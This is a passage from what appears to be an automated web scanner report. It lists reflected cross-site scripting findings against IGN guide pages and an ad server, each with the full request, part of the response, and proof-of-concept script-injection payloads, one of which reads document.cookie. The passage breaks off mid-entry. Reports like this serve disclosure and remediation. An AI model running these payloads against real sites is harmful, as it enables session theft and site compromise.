The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79fa1"><script>alert(1)</script>4d9b8b5138e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /guides/14349501/?79fa1"><script>alert(1)</script>4d9b8b5138e=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.224. http://guides.ign.com/guides/14349501/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/guides/14349501/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2f36"-alert(1)-"33758481171 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /guides/14349501/?a2f36"-alert(1)-"33758481171=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... peof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://guides.ign.com/guides/14349501/?a2f36"-alert(1)-"33758481171=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.225. http://guides.ign.com/guides/14354229/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/guides/14354229/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa952"-alert(1)-"9cf633cfd9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /guides/14354229/?aa952"-alert(1)-"9cf633cfd9a=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... peof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://guides.ign.com/guides/14354229/?aa952"-alert(1)-"9cf633cfd9a=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.226. http://guides.ign.com/guides/14354229/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/guides/14354229/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63fce"><script>alert(1)</script>0df05f822a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /guides/14354229/?63fce"><script>alert(1)</script>0df05f822a8=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.227. http://guides.ign.com/guides/57512/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/guides/57512/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b175"><script>alert(1)</script>368b0241e73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /guides/57512/?2b175"><script>alert(1)</script>368b0241e73=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.228. http://guides.ign.com/guides/57512/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/guides/57512/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18d1a"-alert(1)-"2edcddf6365 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /guides/57512/?18d1a"-alert(1)-"2edcddf6365=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... (typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://guides.ign.com/guides/57512/?18d1a"-alert(1)-"2edcddf6365=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.229. http://guides.ign.com/index/nintendo-ds-guides/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/index/nintendo-ds-guides/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7965"><script>alert(1)</script>dd303f9c616 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/nintendo-ds-guides/index.html?d7965"><script>alert(1)</script>dd303f9c616=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://guides.ign.com/index/nintendo-ds-guides/index.html?d7965"><script>alert(1)</script>dd303f9c616=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.230. http://guides.ign.com/index/nintendo-ds-guides/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/index/nintendo-ds-guides/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae7f8"-alert(1)-"ca818502e9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/nintendo-ds-guides/index.html?ae7f8"-alert(1)-"ca818502e9b=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://guides.ign.com/index/nintendo-ds-guides/index.html?ae7f8"-alert(1)-"ca818502e9b=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.231. http://guides.ign.com/index/pc-guides/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/index/pc-guides/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c1e5"-alert(1)-"2063a2f4975 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/pc-guides/index.html?6c1e5"-alert(1)-"2063a2f4975=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... coreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://guides.ign.com/index/pc-guides/index.html?6c1e5"-alert(1)-"2063a2f4975=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.232. http://guides.ign.com/index/pc-guides/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/index/pc-guides/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3687"><script>alert(1)</script>21ca2f65936 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/pc-guides/index.html?d3687"><script>alert(1)</script>21ca2f65936=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://guides.ign.com/index/pc-guides/index.html?d3687"><script>alert(1)</script>21ca2f65936=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.233. http://guides.ign.com/index/playstation-3-guides/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/index/playstation-3-guides/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf77d"-alert(1)-"df4abcff55c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/playstation-3-guides/index.html?bf77d"-alert(1)-"df4abcff55c=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... = 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://guides.ign.com/index/playstation-3-guides/index.html?bf77d"-alert(1)-"df4abcff55c=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.234. http://guides.ign.com/index/playstation-3-guides/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/index/playstation-3-guides/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 602cf"><script>alert(1)</script>6d68ab200cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/playstation-3-guides/index.html?602cf"><script>alert(1)</script>6d68ab200cc=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://guides.ign.com/index/playstation-3-guides/index.html?602cf"><script>alert(1)</script>6d68ab200cc=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.235. http://guides.ign.com/index/playstation-portable-guides/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/index/playstation-portable-guides/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14581"-alert(1)-"41ba447a92a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/playstation-portable-guides/index.html?14581"-alert(1)-"41ba447a92a=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... fined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://guides.ign.com/index/playstation-portable-guides/index.html?14581"-alert(1)-"41ba447a92a=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.236. http://guides.ign.com/index/playstation-portable-guides/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/index/playstation-portable-guides/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e2e2"><script>alert(1)</script>675d2226e51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/playstation-portable-guides/index.html?9e2e2"><script>alert(1)</script>675d2226e51=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://guides.ign.com/index/playstation-portable-guides/index.html?9e2e2"><script>alert(1)</script>675d2226e51=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.237. http://guides.ign.com/index/wii-guides/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/index/wii-guides/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79f31"-alert(1)-"6589df5dc07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/wii-guides/index.html?79f31"-alert(1)-"6589df5dc07=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... oreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://guides.ign.com/index/wii-guides/index.html?79f31"-alert(1)-"6589df5dc07=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.238. http://guides.ign.com/index/wii-guides/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/index/wii-guides/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e2c4"><script>alert(1)</script>df958c8831b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/wii-guides/index.html?2e2c4"><script>alert(1)</script>df958c8831b=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://guides.ign.com/index/wii-guides/index.html?2e2c4"><script>alert(1)</script>df958c8831b=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.239. http://guides.ign.com/index/xbox-360-guides/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/index/xbox-360-guides/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b789"-alert(1)-"3df258bc491 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/xbox-360-guides/index.html?1b789"-alert(1)-"3df258bc491=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... ard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://guides.ign.com/index/xbox-360-guides/index.html?1b789"-alert(1)-"3df258bc491=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.240. http://guides.ign.com/index/xbox-360-guides/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://guides.ign.com
Path:
/index/xbox-360-guides/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16146"><script>alert(1)</script>33269b53d67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/xbox-360-guides/index.html?16146"><script>alert(1)</script>33269b53d67=1 HTTP/1.1 Host: guides.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23b56'-alert(1)-'486e6fd77ad was submitted in the cnd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ab?enc=AAAAAAAABEAAAAAAAAAEQAAAAMDMzOw_AAAAAAAABEAAAAAAAAAEQGhd3fUU4pxdBWHfHSmrEELqWU9NAAAAAKhYAwBKAAAArgAAAAIAAACP2AIAgWMAAAEAAABVU0QAVVNEANgCWgB0DrcAnwQBAgUCAAQAAAAAwhZeFwAAAAA.&udj=uf%28%27a%27%2C+11344%2C+1297045994%29%3Buf%28%27c%27%2C+48740%2C+1297045994%29%3Buf%28%27g%27%2C+21324%2C+1297045994%29%3Buf%28%27r%27%2C+186511%2C+1297045994%29%3B&cnd=!WBPMAwjk_AIQj7ELGAAggccBKLcBMQAAAAAAAARAQhMIABAAGAAgASj-__________8BSABQAFj0HGAAaK4B23b56'-alert(1)-'486e6fd77ad&referrer=http://www.gamestats.com/&pp=0.414000 HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.gamestats.com/?d0025%22-alert(document.cookie)-%22f21ee463262=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; anj=Kfw)jhV_sE-!h!0f:'doP!/uE9B0XU*HjQ-mdoRVXPU?SX1D6!eojU`S]*2_*a:p?Fk2.f:at07G@JPb4kEE3j#6`Whkd=KM>([Dt9i10pSJVsonqkk]lTrg6mOfksP%iLum4>MlbELf'Ii5'K.j!?X_(Uj+kWEbskhx`k+2wgkAN<d'pw5YCm]^mIN-T.E4bjhLE5o1r[B=(fd[%MC0LUo7Qlx6m!RQk`kj9fjK6t5cxsvKpfJc<IG<W^eSm^LbJEz^%s@nvaW#d7jL+qn?_19Jjm/zh#C?Bo7(>G[]Wt)[/5_DpD4K)b7u(I/bj*_/.-j)ou2YTa$5GIOL(xrF(P.:`gw?Um5pT(_tv#toLa*Xioz?IIp%V<J9N_TE0TTM<m7YA:]WIk.7=)VRZA%!81J8h_9=+^`qdD6E>^?@vTO^aME)G8Om1QDix0Vg0K[.vsUORRFthE_Fq%rOcY[@I<; sess=1; uuid2=4760492999213801733
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Tue, 08-Feb-2011 02:33:59 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 08-May-2011 02:33:59 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Mon, 07 Feb 2011 02:33:59 GMT Content-Length: 669
The value of the referrer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95f6d'-alert(1)-'ed75860967e was submitted in the referrer parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ab?enc=AAAAAAAABEAAAAAAAAAEQAAAAMDMzOw_AAAAAAAABEAAAAAAAAAEQGhd3fUU4pxdBWHfHSmrEELqWU9NAAAAAKhYAwBKAAAArgAAAAIAAACP2AIAgWMAAAEAAABVU0QAVVNEANgCWgB0DrcAnwQBAgUCAAQAAAAAwhZeFwAAAAA.&udj=uf%28%27a%27%2C+11344%2C+1297045994%29%3Buf%28%27c%27%2C+48740%2C+1297045994%29%3Buf%28%27g%27%2C+21324%2C+1297045994%29%3Buf%28%27r%27%2C+186511%2C+1297045994%29%3B&cnd=!WBPMAwjk_AIQj7ELGAAggccBKLcBMQAAAAAAAARAQhMIABAAGAAgASj-__________8BSABQAFj0HGAAaK4B&referrer=http://www.gamestats.com/95f6d'-alert(1)-'ed75860967e&pp=0.414000 HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.gamestats.com/?d0025%22-alert(document.cookie)-%22f21ee463262=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; anj=Kfw)jhV_sE-!h!0f:'doP!/uE9B0XU*HjQ-mdoRVXPU?SX1D6!eojU`S]*2_*a:p?Fk2.f:at07G@JPb4kEE3j#6`Whkd=KM>([Dt9i10pSJVsonqkk]lTrg6mOfksP%iLum4>MlbELf'Ii5'K.j!?X_(Uj+kWEbskhx`k+2wgkAN<d'pw5YCm]^mIN-T.E4bjhLE5o1r[B=(fd[%MC0LUo7Qlx6m!RQk`kj9fjK6t5cxsvKpfJc<IG<W^eSm^LbJEz^%s@nvaW#d7jL+qn?_19Jjm/zh#C?Bo7(>G[]Wt)[/5_DpD4K)b7u(I/bj*_/.-j)ou2YTa$5GIOL(xrF(P.:`gw?Um5pT(_tv#toLa*Xioz?IIp%V<J9N_TE0TTM<m7YA:]WIk.7=)VRZA%!81J8h_9=+^`qdD6E>^?@vTO^aME)G8Om1QDix0Vg0K[.vsUORRFthE_Fq%rOcY[@I<; sess=1; uuid2=4760492999213801733
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Tue, 08-Feb-2011 02:34:03 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 08-May-2011 02:34:03 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Mon, 07 Feb 2011 02:34:03 GMT Content-Length: 669
1.243. http://ie.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ie.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7118d"><script>alert(1)</script>2bfc7f1f75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?7118d"><script>alert(1)</script>2bfc7f1f75=1 HTTP/1.1 Host: ie.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.244. http://ie.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ie.ign.com
Path:
/
Issue detail
